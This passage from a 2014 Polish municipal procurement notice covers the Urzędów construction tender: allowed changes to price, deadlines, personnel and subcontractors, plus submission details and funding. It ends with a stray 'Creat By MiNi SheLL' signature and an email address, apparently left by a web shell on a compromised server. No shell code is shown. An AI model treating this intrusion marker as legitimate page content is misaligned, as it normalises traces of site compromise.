ceny w przypadkach:

a)	konieczności wykonania robót zamiennych w stosunku do przewidzianych dokumentacją projektową,  
b)	zmiana wynika z urzędowej zmiany stawki VAT,
c)	zmiana wynika z możliwości ograniczenia zakresu rzeczowego przedmiotu umowy (roboty zaniechane), wykonania  robót nie ujętych w zamówieniu podstawowym tj. roboty dodatkowe, konieczne do wykonania i oddania do użytkowania przedmiotu niniejszej umowy ( rozszerzenie zakresu), oraz zwiększenie zakresu wynikające 	z rzeczywistych warunków realizacji przedmiotu umowy, gdy w stanie faktycznym  wynikła większa ilość robót niż przyjęto w zamówieniu podstawowym - w przedmiarach robót będących podstawą do opracowania oferty.

terminu w przypadkach:	

a)	      wykonania robót określonych  w podpunktach a) , c) , punkt 1 niniejszego paragrafu  umowy, które  rozszerzą zakres przedmiotu zamówienia podstawowego, o okres nie dłużej niż 10 dni;

b)	na okoliczność wystąpienia niekorzystnych warunków atmosferycznych, które nie  pozwolą na prowadzenie robót budowlanych zgodnie ze sztuka budowlaną, m.in. prowadzenia robót drogowych, robót ziemnych itp. w niniejszym postępowaniu, o faktyczny okres trwania tych warunków;
c)	 wynikający ze zmian spowodowanych nieprzewidzianymi warunkami geologicznymi, archeologicznymi lub terenowymi, o faktyczny okres trwania tych warunków;
d)	niemożliwości niezwłocznego rozpoczęcia robót po podpisaniu umowy i przekazaniu placu budowy ze względu na brak uzyskania wymaganych pozwoleń, zgód , decyzji  itp., o faktyczny czas uzyskania wymienionych pozwoleń zgód i decyzji;

zmiany osobowe i podmiotowe
- zmiana osób, przy pomocy których Wykonawca realizuje przedmiot umowy na inne legitymujące się co najmniej uprawnieniami i kwalifikacjami określonymi w siwz, będzie również wymagała zaakceptowania przez Zamawiającego
- zmiana podwykonawców, zmiana podmiotów  trzecich  na zasobach których Wykonawca opierał się wykazując spełnienie warunków udziału, w okolicznościach gdy, nowy  podwykonawca lub podmiot na zasobach którego Wykonawca  będzie wykazywał spełnienie warunków udziału, wykaże spełnienie tych warunków w zakresie nie mniejszym niż wskazany na etapie postępowania o udzielenie zamówienia publicznego,  dotychczasowy podwykonawca.

Inne zmiany
1.  uzgodniona możliwość wprowadzenia rozwiązań zamiennych w stosunku do przewidzianych  zgłoszonych przez kierownika budowy, lub inspektora nadzoru ( wprowadzona z art. 20 ust. 1 pkt 4 lit a i b ustawy Prawo budowlane)
2.     zmiany dokonane podczas wykonywania robót nie odstępujące w sposób istotny od  warunków zgłoszenia lub pozwolenia na budowę, , w ramach art. 36a ust. 5 ustawy Prawo budowlane,  spełniając zapisy art. 57 ust 2  ustawy Prawo budowlane)

Wszystkie powyższe postanowienia stanowią katalog zmian na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.

Przewidziane wyżej zmiany postanowień umowy nie wymagają wprowadzania aneksu,  z zastrzeżeniem zmian dotyczących terminu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ugurzedow.bip.lubelskie.pl   zakładka ogłoszenia   zakładka przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Urzędów, ul. Rynek 26, 23-250 Urzędów, pokój nr 12. Siwz jest nieodpłatna..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.09.2014 godzina 10:00, miejsce: Urząd Gminy Urzędów, ul. Rynek 26, 23-250 Urzedów, pokój nr 6.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 15.10.2014.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy - projekt finansowany z własnych środków.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com